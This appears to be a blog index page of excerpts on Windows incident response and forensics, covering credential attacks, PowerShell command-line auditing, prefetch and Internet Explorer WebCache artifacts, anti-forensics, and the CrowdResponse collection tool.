The team at FIRST (Forum of Incident Response and Security Teams) reached out to talk about my upcoming presentation on Windows credential attacks at their annual conference. We spoke about why enterprise credential protection is so important and some of the recent Microsoft updates to help minimize the attack surface. The entire Windows credential infrastructure has been under unceasing attack over the last couple of years, and amazingly things are about to get far worse. New tools like Bloodhound and Death Star are using graph databases to effortlessly map account permissions and sessions, greatly magnifying poor credential hygiene. At the moment, it is hard to imagine a larger threat to the enterprise. Podcast:


If you will miss FIRST2017, I will be presenting a complementary presentation at the SANS DFIR Summit on June 22, 2017.

Note:  This article originally appeared on the CrowdStrike blog.  Look here for additional context.

Detecting reconnaissance activity is something that few blue teams spend time on.  Networks are barraged with a near continuous stream of scanning, and determining targeted activity versus Internet noise can be exceedingly difficult.  However, there are a few things you can do to counter activity in this early stage of an attack.

Self-Recon is the Best Recon

Knowing that reconnaissance is ubiquitous, your best defense is to get ahead of the game and scan your own networks.  Schedule regular asset identification and vulnerability scans, and prioritize vulnerability patching.  If someone on your team is regularly testing for SQL injection vulnerabilities in your critical web applications, you won’t have to spend your weekends remediating sqlmap pwnage.  The same preparatory actions can help mitigate both active and passive reconnaissance activity.  Our team regularly helps clients conduct open-source data collection to identify unnecessary information leakage by company or employee assets.  This is exactly what a red team should be doing – helping the organization anticipate attacks and limit their attack surface.

Continue Reading…

PowerShell is becoming ubiquitous in the Microsoft ecosystem, and, while it simplifies administration, it opens up a nearly unprecedented suite of capabilities for attackers.  Nearly every malicious activity imaginable is possible with PowerShell: privilege escalation, credential theft, lateral movement, data destruction, persistence, data exfiltration, and much more.  Malicious PowerShell is being used in the wild, and CrowdStrike has seen an uptick in the number of advanced adversaries employing it during breaches.  Dmitri Alperovitch wrote about one of these actors, Deep Panda, in his article “Deep in Thought: Chinese Targeting of National Security Think Tanks.”  Attackers are leaning more on PowerShell because it is readily available and gets the job done with an added bonus of leaving behind almost no useful forensic artifacts.  Jaron Bradley and I previously tackled the subject of command-line auditing in the CrowdCast, “What Malware? Hunting Command Line Activity”.  I am pleased to report that there have been some significant upgrades to command line logging since that webcast.

Process Creation Events

Starting with Server 2012R2, Microsoft released a new group policy setting to enable the recording of full command lines in Process Tracking audit events. Continue Reading…

It wasn’t that long ago that every report I read containing Windows prefetch artifacts included only the basics: executable name, first and last time executed (now eight timestamps in Win8), and number of executions. There is much more information stored in prefetch files, but until recently there were few tools to easily parse and provide it to the examiner. Mark McKinnon wrote one of the first prefetch parsers to include full path names for additional files accessed within the first ten seconds of application launch. TZWorks’ pf tool now also provides this information. Depending on case type, this information could be overkill, but imagine a prefetch file tracking execution of a malicious binary while also identifying a related malicious DLL loaded, or the location of keylog output. A lot of files are accessed within the first ten seconds of execution, so you may find evidence of specific documents opened in the prefetch file for the Microsoft WinWord application or in the case of Figure 1, files accessed within zip archives via a 7zip prefetch file.


Figure 1: Excerpt showing file access recorded inside a prefetch file (output from TZWorks pf)

Continue Reading…

With the release of Internet Explorer 10, Microsoft made a radical departure from the way previous browser artifacts were stored.  The perennial Index.dat records were replaced with a centralized meta-data store for the browser using the proven “JET Blue” Extensible Storage Engine (ESE) database format.  While many forensic examiners have remained blissfully unaware of the ESE format, it has been increasingly used throughout Microsoft products for Exchange, NTDS.DIT, the Windows search database, Windows Live Messenger contacts, and Internet Explorer (IE).  With the introduction of an enterprise-grade database hosting network artifacts, it is now time for every Windows investigator to understand how the database works and what data they may be missing.  Remember that even if a user never opens Internet Explorer, there may still be valuable records in their IE database including files opened on the local system, network shares, and removable devices.  It may also hold evidence of malicious activity including HTTP connections initiated on behalf of malware or suspicious sites visited via links clicked in email clients.  Internet Explorer and its supporting libraries are deeply tied to the Windows operating system and WinINet API functions often interact with IE databases.  Thus IE history, and the WebCache database in particular, continues to be a rich data source during many forensic examinations. Continue Reading…

One of the great pleasures of performing Windows forensics is there is no shortage of application execution artifacts.  Application execution tells us what has run on a system and is often the pivot point that reveals important activity on the system.  Why was FTP run on this workstation?  Is it normal to see execution of Winsvchost.exe?  Why was a privacy cleaning tool used for the first time during the system owner’s last week of work?  While undoubtedly useful, our adversaries are more forensic-aware than ever and often take steps to eliminate application execution artifacts.  At CrowdStrike we routinely encounter nation-state groups that attempt to delete Prefetch.  Even the popular CCleaner anti-forensics tool defaults to clearing Prefetch and UserAssist data.  Hence having additional sources of data can often mean the difference between an easy examination and a long, painful one.CCleaner Prefetch Delete

Continue Reading…

The third release of the free CrowdResponse incident response collection tool is now available!  This time around we are including plugins facilitating collection of Windows registry data.  Our inspiration for this release was one of those vulnerabilities that just won’t die, Windows Sticky Keys, and we’ll show how to identify this attack while demonstrating the new additions.

New Plugins

@RegDump [-ds]

RegDump recursively extracts Windows registry key and value data.

-d  Nested output format
-s  Recursive dump
<reg key> Registry key to start dump from

Valid registry hive names are: HKLM, HKCU, HKCR, HKU, and HKAU (pseudo key representing all users)

@RegFile [-scmh]

RegFile searches for registry string values (REG_SZ and REG_EXPAND_SZ) and identifies file path data.  If the file exists on disk, file information, hash, and digital signature details are recorded.  Continue Reading…

My recent webcast with Jaron Bradley was recorded and a link is available below.  If you have been looking for an excuse to get more familiar with Windows PowerShell, have a look.

What Malware?  Hunting Command Line Activity

There is a reason hackers use the command line, and it isn’t to impress you with their prowess. Throughout the history of Windows, the command line has left far fewer forensic artifacts than equivalent operations via the GUI. To make matters worse, the transition to Windows 7 and 8 has spread PowerShell throughout the enterprise. While it makes our lives easier as defenders, it does the same for our adversaries. Every time you marvel at the capabilities of PowerShell, you should fear how your adversaries may use that power against you.

In this CrowdCast we have collected tips and tricks from our incident responders describing how they are countering the command line threat. Learn to identify when it is in play, extract commands from memory and network packets, and see what is new on the horizon from Microsoft to make tracking command line activity easier.

It has been an interesting year for attacks against the Windows credential model.  If you aren’t familiar with the Mimikatz “Golden Ticket” attack, it represents some of the best justification for guarding your domain administrator credentials with your life (if you really needed additional justification).  CERT EU published an excellent whitepaper on strategies for mitigating this attack.


CrowdResponse is a free tool written by Robin Keir from CrowdStrike. Robin has a long history of developing excellent tools for the community including SuperScan, BinText, Fpipe, and CrowdInspect. The goal of CrowdResponse is to provide a lightweight solution for incident responders to perform signature detection and triage data collection. It supports all modern Windows platforms up to Server 2012 and is command-line based making it easy to deploy at scale. Version 1.0 focuses on signature detection, with a powerful YARA scanning engine. It ships with a very detailed user manual but since only a few actually read such things, I thought it would be interesting to show the tool in action.

Running YARA Scans

YARA, or Yet Another Regex Analyzer, has become one of the leading tools for describing and detecting malware. A YARA rule consists of a series of strings tied together by a Boolean condition. It facilitates searching with text, hex, Unicode, wildcards, case-insensitivity, and regular expressions. Combining these options allows construction of complicated tests to limit false positives. As an example, consider this YARA rule:

Continue Reading…